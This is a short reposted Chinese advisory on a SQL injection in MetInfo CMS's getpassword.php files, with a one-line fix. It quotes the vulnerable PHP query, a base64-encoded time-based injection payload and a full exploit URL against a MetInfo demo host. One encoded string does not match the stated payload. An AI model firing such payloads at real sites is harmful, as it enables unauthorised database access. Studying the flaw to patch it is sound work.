鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

metinfo企业网站管理系统SQL注入及修复方案

来源:互联网 作者:佚名 时间:2015-10-19 08:39
member/getpassword.php与admin/admin/getpassword.php文件中 if($p){ $array = explode(.,base64_decode($p)); $sql=SELECT * FROM $met_admin_table WHERE admin_id=.$array[0].; $sqlarray = $db-get_one($sql); base64_decode($p)后的值用explode分割然后
member/getpassword.php与admin/admin/getpassword.php文件中
 
 
if($p){
   $array = explode('.',base64_decode($p));
   $sql="SELECT * FROM $met_admin_table WHERE admin_id='".$array[0]."'";
   $sqlarray = $db->get_one($sql);

 

 
 
base64_decode($p)后的值用explode分割然后提交给 $array数组,最终$array[0]进入SQL查询,注入发生。 


1'or(select sleep(5))#.1将之base64编码MSdvcihzZWxlY3Qgc2xlZXAoMTApKSMuMQ==
 
然后
 
http://demo.metinfo.cn/member/getpassword.php?lang=cn&p=MSdvcihzZWxlY3Qgc2xlZXAoNSkpIy4x 
修复方案:

过滤$array[0] 
 
网友评论
<